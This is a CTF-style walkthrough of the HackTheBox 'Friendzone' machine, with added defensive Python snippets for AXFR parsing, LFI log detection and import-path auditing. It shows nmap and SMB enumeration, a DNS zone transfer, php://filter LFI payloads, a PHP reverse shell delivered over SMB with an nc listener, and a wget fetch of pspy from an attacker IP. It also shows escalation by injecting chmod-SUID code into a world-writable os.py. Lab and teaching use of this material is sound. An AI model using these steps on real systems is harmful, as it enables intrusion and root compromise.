PRIMARY CATEGORY → EASY

Summary

  • DNS Zone Transfer Attack (Dig)
  • SMB Enumeration (Netexec - SMBMap - SMBClient)
  • Common Name Extraction from TLS Certificate (OpenSSL Client)
  • Web Content Fuzzing (Gobuster)
  • LFI using the PHP Wrapper PHP://Filter to extract the PHP Scripts’ Content
  • RCE via File Upload through SMB + LFI
  • Privesc via Information Leakage
  • Privesc via Python Library Hijacking + Cron Job


Setup

Directory creation with the Machine’s Name

mkdir Friendzone && cd !$

Creation of a Pentesting Folder Structure to store all the information related to the target

Reference

mkt

Recon

OS Identification

First, proceed to identify the target Operating System. This can be done with a simple ping, taking into account the TTL value of the reply

The standard initial values are →

  • About 64 → Linux
  • About 128 → Windows

ping -c1 10.129.77.162

As mentioned, according to the TTL, it seems to be a Linux target

Port Scanning
General Scan

Let’s run a Nmap Scan to check what TCP Ports are opened in the machine

The Scan result is exported in a grepable format for subsequent Port Parsing

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn --disable-arp-ping -oG allPorts 10.129.77.162

Open Ports → 21, 22, 53, 80, 139, 443 and 445

Comprehensive Scan

The ExtractPorts utility is used to get a Readable Summary of the previous scan and have all Open Ports copied to the clipboard

extractPorts allPorts

Then, the Comprehensive Scan is performed to gather the Service and Version running on each open port and launch a set of Nmap Basic Recon Scripts

Note that this scan is also exported to have evidence at hand

nmap -p21,22,53,80,139,443,445 -sCV -vvv -n -Pn --disable-arp-ping -oN targeted 10.129.77.162

OS Version (Codename)

On Linux systems, the Operating System version can be inferred from the service versions by searching them on Launchpad

According to the Version Column Data of the Comprehensive Scan, proceed as follows →

  • 22 - SSH

Reference

OpenSSH 7.6p1 Ubuntu 4 site:launchpad.net

  • 80 - HTTP

Reference

Apache httpd 2.4.29 site:launchpad.net

  • 443 - HTTPS

Reference

Apache httpd 2.4.29 site:launchpad.net

Codename → Ubuntu Bionic

This can be verified once a shell is obtained, i.e. once the system has been compromised

There are several ways to carry it out →

cat /etc/os-release
hostnamectl # If System has been booted via Systemd
lsb_release -a
cat /etc/issue
cat /proc/version

22 - SSH

OpenSSH Version → v7.6

The Version of the Service running can also be obtained via Banner Grabbing as follows →

nc -vn 10.129.77.162 22 <<< ""

CVE-2018-15473

All OpenSSH versions prior to 7.7 are vulnerable to system user enumeration

Reference

CVE-2018-15473 → OpenSSH < v7.7

searchsploit ssh user enumeration

To get the ExploitDB links related to above exploits →

searchsploit --www ssh user enumeration

Exploit → OpenSSH < 7.7 - User Enumeration (2)

To examine it →

searchsploit --examine linux/remote/45939.py |& cat --language python

This exploit requires Python2

Then, execute it as follows →

searchsploit --mirror linux/remote/45939.py
mv "${_##*/}" ssh_exploit.py
python2 !$

In this case, nothing interesting is extracted

21 - FTP

As always, we start by checking whether Anonymous FTP login is enabled, to be able to extract any sensitive data

ftp -a 10.129.77.162 21

If the output of the above command is not very clear, you can also use wget to try to download the content of the FTP directory recursively

wget --mirror --ftp-user='anonymous' --ftp-password='' "ftp://10.129.77.162:21"

As we can see, it seems that Anonymous FTP login is not enabled

There is nothing else we can check except the FTP Service Version; it may be vulnerable

FTP Service and Version → vsftpd 3.0.3

We use searchsploit for this task

searchsploit vsftpd

There is nothing interesting for the version we have; we will not get anything from the Remote Denial of Service either

53 - DNS

The DNS Service Version has been extracted before with Nmap

We can also extract it using dig

dig CHAOS TXT version.bind @10.129.77.162 +short

We can search for known exploits or CVEs for that version but we will not find anything

At the moment we have no valid domain to attempt a DNS Zone Transfer, or to use dig with ANY to get some DNS records from the specified domain's DNS Zone

139, 445 - SMB

Let's grab some information about the target, such as the hostname and some aspects of the exposed SMB Service, using netexec

nxc smb 10.129.77.162

The host is not a Windows machine, but at least we have its name

Therefore, let’s add this name to the /etc/hosts file so that we can refer to this machine by its name instead of by its IP Address

printf "\n10.129.77.162\tfriendzone\n" >> /etc/hosts

Shared Resources Enumeration

We can continue with netexec and list the Target’s Shared Resources

Since we do not have any valid credentials yet, just proceed with a Null Authentication to see if we get something

nxc smb friendzone --username '' --password '' --shares

We are able to list the Shared Resources through a SMB Null Authentication

Note that we can achieve the same using other tools such as smbclient or smbmap

  • SMBClient
smbclient --user '' --no-pass --list friendzone
  • SMBMap
smbmap -H friendzone -u '' -p ''

According to the above results, we have read perms on General and read and write perms on Development

As said, take into account that we have write permissions on a shared resource

We can enumerate these resources using the previous tools

With smbclient we can establish an interactive SMB session to navigate between all the resources contained within the shared folder

But this time, I think It is better to use smbmap or netexec with the spider_plus module to list all their contents

  • SMBMap
smbmap -H friendzone -u '' -p '' -r 'general'
smbmap -H friendzone -u '' -p '' -r 'Development'
  • Netexec - spider_plus Module
nxc smb friendzone --username '' --password '' --module spider_plus --share 'general'
cat --language json -- /tmp/nxc_hosted/nxc_spider_plus/10.129.77.162.json

There is nothing inside the Development folder, so we will not perform the same scan with netexec as we have done with the General one

Unlike the Development folder, the General folder has one file named creds.txt

Simply download it and inspect its content

smbmap -H friendzone -u '' -p '' --download 'general/creds.txt'

It seems that we have credentials to log in somewhere as the Admin user

Now, we can try to authenticate with that user in SSH, FTP and SMB to see if we can gain access to the target or at least enumerate more resources

But, unfortunately, these credentials do not work in any of the above services

So, let’s move to the Web Services!

443 - HTTPS

The HTTPS service uses certificates to encrypt the connection between client and server

These certificates are issued for one or more Common Names. Therefore, we can use openssl to extract those Common Names

openssl x509 -noout -subject < <( openssl s_client -connect 10.129.77.162:443 2> /dev/null 0>&2 )

And we are able to extract the domain Friendzone.red

Thus, we can also add this one to the /etc/hosts file

printf "10.129.77.162\tfriendzone.red" >> /etc/hosts

53 - DNS

Now that we have a valid domain, we can try to carry out a DNS Zone Transfer using dig

dig axfr friendzone.red @10.129.77.162

Filter by the DNS records' names as follows →

dig axfr friendzone.red @10.129.77.162 | grep -iPo -- '^[^;](\w+\.)+\s' | sort -u

Let's add all these subdomains to the /etc/hosts file

printf "\t%s" "$( dig axfr friendzone.red @10.129.77.162 | grep -iPo -- '^[^;](\w+\.)+\s' | sort -u | xargs | tr ' ' '\t' )" >> /etc/hosts

Note that all these subdomains are configured in the Apache Web Server as Virtual Hosts. In that case, different content will be delivered to the client depending on the Virtual Host for which the request is made
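As an added example that is not part of the original write-up, the same filtering done in Python: it parses the AXFR answer into records, strips the trailing dot that the grep one-liners above keep (which is why later URLs read uploads.friendzone.red./), and builds the /etc/hosts line. The AXFR text is a constructed sample using only names from this write-up; the record data are placeholders.

```python
"""Parse `dig axfr` output into unique hostnames and an /etc/hosts line."""
import re

# Constructed sample of a dig axfr answer (not the real zone); record data are placeholders.
SAMPLE_AXFR = """\
; <<>> DiG 9.18.24 <<>> axfr friendzone.red @10.129.77.162
;; global options: +cmd
friendzone.red.\t\t604800\tIN\tSOA\tlocalhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red.\t\t604800\tIN\tNS\tlocalhost.
friendzone.red.\t\t604800\tIN\tA\t127.0.0.1
administrator1.friendzone.red. 604800\tIN\tA\t127.0.0.1
uploads.friendzone.red.\t604800\tIN\tA\t127.0.0.1
friendzone.red.\t\t604800\tIN\tSOA\tlocalhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 40 msec
"""

# One resource record per line: owner-name  ttl  class  type  rdata (comments start with ';')
RR_LINE = re.compile(r"^(?P<name>[^\s;]+)\s+\d+\s+IN\s+(?P<type>[A-Z]+)\s+(?P<rdata>.*)$")


def parse_axfr(text):
    """Return (name, type, rdata) tuples; names are lower-cased with the trailing dot removed."""
    records = []
    for line in text.splitlines():
        m = RR_LINE.match(line)
        if m:
            records.append((m.group("name").rstrip(".").lower(), m.group("type"), m.group("rdata")))
    return records


def hostnames(text, types=("A", "AAAA", "CNAME")):
    """Unique names that resolve to an address, i.e. the virtual hosts worth adding to /etc/hosts."""
    return sorted({name for name, rtype, _ in parse_axfr(text) if rtype in types})


def hosts_line(ip, text):
    """A single /etc/hosts line mapping every discovered name to the target IP."""
    return ip + "\t" + " ".join(hostnames(text))


if __name__ == "__main__":
    print(hosts_line("10.129.77.162", SAMPLE_AXFR))
```

Pointed at your own name servers, the same parser lists exactly which names a server that answers AXFR to any client is handing out; restricting zone transfers to the secondaries is the fix.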

80, 443 - HTTP[s]

Let’s examine the Web Technologies that are running in the Web Server using whatweb

whatweb http://10.129.77.162

Another domain is leaked in the source code of this website → Friendzoneportal.red

As always, let’s add this one to the /etc/hosts file too

printf "\n10.129.77.162\tfriendzoneportal.red" >> /etc/hosts

53 - DNS

Before continuing to enumerate the Web Server, let's try another DNS Zone Transfer with the domain obtained

dig axfr friendzoneportal.red @10.129.77.162

To filter again by the DNS records' names, proceed as follows →

dig axfr friendzoneportal.red @10.129.77.162 | awk '/^[^;]/ {print $1}' | sort -u

Again… add those subdomains in the /etc/hosts file 😅

printf "\t%s" "$( dig axfr friendzoneportal.red @10.129.77.162 | awk '/^[^;]/ {print $1}' | sort -u | xargs )" >> /etc/hosts

80, 443 - HTTP[s]

Continue with whatweb on the 443 Port

whatweb https://10.129.77.162

We get a 404 Not Found HTTP Error

Let’s apply the same for both domains

whatweb http://{friendzone,friendzoneportal}.red
whatweb https://{friendzone,friendzoneportal}.red

Nothing interesting is reported; we already know that the Web Server is Apache

10.129.77.162:80

From the Browser →

We have already seen that domain using whatweb

There is nothing in the Source Code either

10.129.77.162:443

The whatweb tool reported that this URL returns a 404 Not Found HTTP Error

Friendzone.red:80

The same content as here

Friendzone.red:443

From the Browser →

In this case, some information is leaked in the Source Code

Reference is made to the following URL → https://friendzone.red/js/js

The following content is displayed →

That string looks strange; it seems to be base64-encoded, but we get nothing meaningful if we decode it

Friendzoneportal.red:80

The same content as here

Friendzoneportal.red:443

From the Browser →

There is nothing interesting in the Source Code either

Subdomains

If we carry out the same task with all the subdomains found through DNS Zone Transfer for both domains, friendzone.red and friendzoneportal.red, we get the same content as http://10.129.77.162:80 in most of them

However, things change for the following ones →

We get the following content from the browser:

It seems that we can upload images. We could think about uploading a WebShell or something similar

But first, we need to know whether there is any Server-Side Programming Language running and the path where the uploaded files are stored

whatweb https://uploads.friendzone.red./

Whatweb does not report anything about a Programming Language running such as PHP, Python or JS

Nevertheless, we can try to apply Fuzzing and see if we get the uploaded files' web path or other interesting resources

gobuster dir --threads 150 --add-slash --wordlist /usr/share/seclist/Discovery/Web-Content/directory-list-2.3-medium.txt --url https://uploads.friendzone.red./ -k

We find a directory /files/, but when accessing it from the browser, it does not respond and generates a timeout

A login panel is displayed →

We can try to log in with the credentials we obtained earlier via SMB

Credentials → admin:WORKWORKHhallelujah@#

But we get the following response

There is nothing in the source code either

We also were not assigned a session cookie

Therefore, it appears that the login functionality is not yet implemented

Here we have another login panel, but this one seems to be different

Let’s test the credentials we have again

Unlike the last login panel, with this one we have successfully logged in and a Session Cookie has been set

It says that we have to visit /dashboard.php, let’s do it!

It displays the following content →

It seems that we can refer to images and pagenames in those URL Parameters

The image_name parameter may be related to the page we inspected earlier, where we could upload images

While we inspect the functionality of this page, let's run another gobuster to see if we can discover some PHP resources

Remember that earlier we logged in thanks to a login.php script and now we are inspecting a dashboard.php script. So, it's obvious that PHP is the Server-Side Programming Language in this case

We can verify this statement through the Wappalyzer Browser Add-on

Thus, let’s run gobuster again, but this time specifying as extension PHP

gobuster dir --threads 150 --output webScan_administrator1_friendzone_red --wordlist /usr/share/seclist/Discovery/Web-Content/directory-list-2.3-medium.txt --extensions php --url https://administrator1.friendzone.red/ -k

We discover the following resources →

  • Login.php

We have already seen it

  • Dashboard.php

We are currently in it

  • Timestamp.php

It appears that it displays a specific timestamp. There is no functionality other than that


Exploitation

RCE via File Upload through SMB + LFI

Local File Inclusion through PHP://Filter

If we test the functionality mentioned in the Web Page using the indicated URL Parameters, we will get the following content →

If we pay attention, it looks like the timestamp.php resource is being included in the HTTP Response Body

Since we have referenced this file in the pagename URL parameter of the dashboard.php script, we can try to point to other resources such as the ones listed above with gobuster

If we request the following content trying to include the login.php resource →

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=login

We receive the following HTTP Response

It is the same response that we get from the login.php resource if we log in incorrectly. So, we can confirm that an LFI is happening here

Let's try to extract the dashboard.php's PHP Code using the PHP Wrapper php://filter

This PHP Wrapper allows us to obtain the PHP Script’s code in base64 format, to decode it afterwards

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=login

Content displayed →

Here we go! It works! We can do the same with the rest and decode the base64-encoded strings to check whether there is a bug in the PHP Code or an information leak such as passwords, database connections…

  • Login.php
  • Timestamp.php
  • Dashboard.php

Inspecting the PHP Code of the dashboard.php script, we can confirm what we said before, this snippet concatenates a .php extension to the value of the pagename parameter and passes all this as argument to the include() function

Apart from that, there is nothing else interesting, no juicy comments, passwords or database connections…
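The inclusion bug above (the pagename value with ".php" appended, passed to include()) is fixed by only including names from a fixed allowlist, and that same allowlist makes a useful detection rule. The following is an added example, not code from the write-up: it runs that rule over constructed Apache access-log lines built from the requests used in this section, flagging every pagename that is not a plain page name; the allowlist of three scripts is the one gobuster found, and the log format is assumed to be Apache's common format.

```python
"""Flag dashboard.php requests whose pagename parameter is not a plain page name."""
import re
from urllib.parse import urlsplit, parse_qs, unquote

KNOWN_PAGES = {"login", "dashboard", "timestamp"}   # the only scripts that should ever be included

# Constructed sample log lines (Apache common format), mirroring the requests in this section.
SAMPLE_LOG = """\
10.10.16.34 - - [12/Mar/2024:10:00:01 +0000] "GET /dashboard.php?image_id=a.jpg&pagename=timestamp HTTP/1.1" 200 512
10.10.16.34 - - [12/Mar/2024:10:00:07 +0000] "GET /dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=login HTTP/1.1" 200 1844
10.10.16.34 - - [12/Mar/2024:10:00:15 +0000] "GET /dashboard.php?image_id=a.jpg&pagename=/etc/Development/reverse HTTP/1.1" 200 0
10.10.16.34 - - [12/Mar/2024:10:00:20 +0000] "GET /dashboard.php?image_id=a.jpg&pagename=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 0
10.10.16.34 - - [12/Mar/2024:10:00:25 +0000] "GET /login.php HTTP/1.1" 200 300
"""

REQ = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"')


def classify_pagename(value):
    """Return None for a legitimate page name, otherwise a short reason string."""
    v = unquote(value)            # decode once more to catch double-encoded values
    if "://" in v:
        return "php-wrapper"      # php://filter, data://, expect://, ...
    if v.startswith("/") or ".." in v:
        return "path-traversal"   # absolute path (e.g. /etc/Development/...) or directory escape
    if v not in KNOWN_PAGES:
        return "unknown-page"     # anything the allowlist would have refused
    return None


def scan_log(text):
    """Return (ip, timestamp, reason, pagename) for every suspicious dashboard.php request."""
    findings = []
    for line in text.splitlines():
        m = REQ.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if url.path != "/dashboard.php":
            continue
        for value in parse_qs(url.query).get("pagename", []):
            reason = classify_pagename(value)
            if reason:
                findings.append((m.group("ip"), m.group("ts"), reason, value))
    return findings


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(*hit)
```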

Arbitrary File Upload via SMB

However, remember that we have write permissions on one of the Shared Resources via SMB

If we are able to know what is the system path where the files we upload are stored, we could point to them through the LFI we already have

Let’s take a look back and analyze again the shared folders that we listed earlier

smbmap -H friendzone -u '' -p ''

In the comments sections, we have one that stands out above the rest

“FriendZone Samba Server Files /etc/Files”

This is related to the Files shared folder, which we can assume to be located in /etc and therefore its full path is /etc/Files

Although we do not know anything about the location of the Development shared folder, which is where we have write permissions, we could also assume that is in /etc, being its full path /etc/Development

Therefore, assuming that the PHP open_basedir directive is not set (none) or that the /etc path is included in it, let's create a PHP Reverse Shell, upload it to the Development shared folder and point to it using the LFI

nvim reverse.php
smbmap -H friendzone -u '' -p '' --upload './reverse.php' 'Development/reverse.php'

Check if the reverse shell has been uploaded correctly →

smbmap -H friendzone -u '' -p '' -r 'Development'

Everything seems to be ok. Just set up a listener on your machine with the TCP Port you specified in the PHP Reverse Shell, point to the uploaded file using its full path and let's see what happens

  • From the Attacker
nc -nlvp 443
  • Dashboard.php →
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/reverse

And here we go! We are in!


Shell as Web User

Once a connection via Reverse Shell is established, just proceed as follows to upgrade the obtained shell to a Fully Interactive TTY

Reference

Script
script /dev/null -c bash
<C-z>
stty raw -echo ; fg
reset xterm
export TERM=xterm-256color
export SHELL=/bin/bash
. /etc/skel/.bashrc
stty rows <ROWS> columns <COLUMNS>

Privesc #1

Initial Non-Privileged User → www-data

Information Leakage (Database Connection)

Right now, we are in as www-data

id
sudo -l

We are not part of any sensitive group and we do not have the password of the user www-data, therefore, we cannot see if this user has any sudo privileges

If we inspect the files in /var/www, we see different directories that correspond each one to an Apache Virtual Host through the Document Root directive

But we see another interesting file called mysql_data.conf. It may contain credentials since it’s a configuration file

cat mysql_data.conf

We can check if there is a user called friend as follows →

ls -l /home

Or

grep -i -- sh\$ /etc/passwd

And yes, there is

Just check if the credentials we have found in that configuration file are valid for that user

su - friend

And yes again! We are the friend system user

Just grab the user.txt flag’s content and continue 😊

Privesc #2

Non-Privileged User → friend

Python Library Hijacking + Cron Job

Once we are friend, let’s inspect our home directory to see if there is any juicy data in any file

find . -ls

Nothing interesting; we also have to check SUID or SGID Binaries and Capabilities

find / -type f -user root -perm 4755 -ls 2> /dev/null
command -V getcap && getcap -r / 2> /dev/null

There are no interesting SUID Binaries to privesc with, and we cannot list the system capabilities for any binary

Let’s see if there are any declared Cron Jobs in the /etc/crontab file or systemctl timers

grep -iP -- '^[^#].+' /etc/crontab
systemctl list-timers

There is nothing relevant here either

Cron Job and Recurring Tasks Enumeration using PSPy

Download the PSPy binary on your machine and transfer it to the target. Then we can run it and monitor the processes running on the system recurrently

  • From the Attacker
curl --silent --request GET --remote-name --location "https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64"
python3 -m http.server 8888
  • From the Target
command -V wget && wget "http://10.10.16.34:8888/pspy64" -O pspy64
chmod 700 !$ && ./pspy64

Once the binary is launched and starts monitoring the running processes in the system, one of them stands out

We can see that there is a Python script called reporter.py that is executed by the user with UID 0, i.e. Root

  • /opt/server_admin/reporter.py permissions
ls -l /opt/server_admin/reporter.py

  • /opt/server_admin/reporter.py content

Python Library Hijacking

Reference

Remember that there are different scenarios where we can abuse this attack vector

Here, we have seen that we do not have permission to execute or modify the python script. We can only see its content

But, thanks to the read permission, we know that the script imports the os python module

Thus, let’s locate this python module in the file system and check if we have write permission on it

find / -iname 'os.py*' -type f -ls 2> /dev/null

Note that Others have full permissions on the /usr/lib/python2.7/os.py file

This module is related to python2.7

The script is being executed by Root using the /usr/bin/python binary

Let's check the version of python that corresponds to it

ls -l $( command -v python )

It is Python2.7! Note that we have full permissions on the Python2.7's os module
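An added check, not part of the write-up, for exactly the condition just found: given an interpreter's sys.path, it reports search directories and copies of the named module that are writable by others, which is what lets a root cron job be hijacked. demo() builds a constructed scenario in a temp dir with one healthy os.py and one mode-0777 copy; interpreter_sys_path() is a helper that asks the job's interpreter (assumed to be /usr/bin/python) for its own path instead of trusting the auditing interpreter's.

```python
"""Report import-path entries a non-root user could modify for a given interpreter.

A root cron job running /usr/bin/python /opt/server_admin/reporter.py imports os.py
from that interpreter's sys.path; a writable directory or module there lets the
job be hijacked. demo() builds a constructed scenario in a temp dir.
"""
import os
import stat
import subprocess
import sys
import tempfile


def interpreter_sys_path(python="/usr/bin/python"):
    """Ask the interpreter the job uses (assumed /usr/bin/python) for ITS sys.path."""
    code = "import sys; print('\\n'.join(sys.path))"
    out = subprocess.run([python, "-c", code], capture_output=True, text=True, check=True).stdout
    return [p for p in out.splitlines() if p]


def world_writable(path):
    """True if the 'others' write bit is set (add stat.S_IWGRP if group members are untrusted)."""
    return bool(os.stat(path).st_mode & stat.S_IWOTH)


def audit_import_path(paths, modules=("os.py",)):
    """Return [(path, reason)] for writable search dirs and writable copies of the named modules."""
    findings = []
    for d in paths:
        if not os.path.isdir(d):
            continue                      # '' (cwd), zip entries, missing dirs
        if world_writable(d):
            findings.append((d, "directory writable: a shadowing module could be planted"))
        for name in modules:
            f = os.path.join(d, name)
            if os.path.isfile(f) and world_writable(f):
                findings.append((f, "module writable: imported code can be replaced"))
    return findings


def demo():
    """Constructed case: one sane lib dir and one whose os.py is mode 0777 like the target's."""
    root = tempfile.mkdtemp()
    good, bad = os.path.join(root, "lib_ok"), os.path.join(root, "python2.7")
    for d in (good, bad):
        os.mkdir(d, 0o755)
        with open(os.path.join(d, "os.py"), "w") as fh:
            fh.write("# stub module for the demo\n")
    os.chmod(os.path.join(good, "os.py"), 0o644)
    os.chmod(os.path.join(bad, "os.py"), 0o777)   # the misconfiguration found above
    return [path for path, _ in audit_import_path([good, bad])]


if __name__ == "__main__":
    for path, why in audit_import_path(sys.path):
        print(path, "-", why)
```

On the target the audit would be run as audit_import_path(interpreter_sys_path()), so the path checked is the one the cron job's interpreter actually uses.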

Therefore, we can proceed to modify this python module and, for example, add a line that grants the SUID special permission to the /bin/bash binary

In this case, since we are editing the os module, which is normally used to execute system commands, we will import the subprocess module and use the subprocess.call method/function

vi /usr/lib/python2.7/os.py
  • Code Snippet added →
import subprocess
subprocess.call(["chmod", "4755", "/bin/bash"])

We can monitor the /bin/bash permissions as follows →

watch -n2 ls -l /bin/bash

Or →

while : ; do ls -l /bin/bash ; sleep 2 ; clear ; done

Wait for the Cron Job to run again and then… Boom! We have the SUID permission assigned to the /bin/bash binary!

ls -l /bin/bash

The only thing left to do is to launch a /bin/bash instance in a privileged way and become Root

bash -pi
whoami

Get the content of the root.txt flag and move on to the next machine! 😊

cat /root/root.txt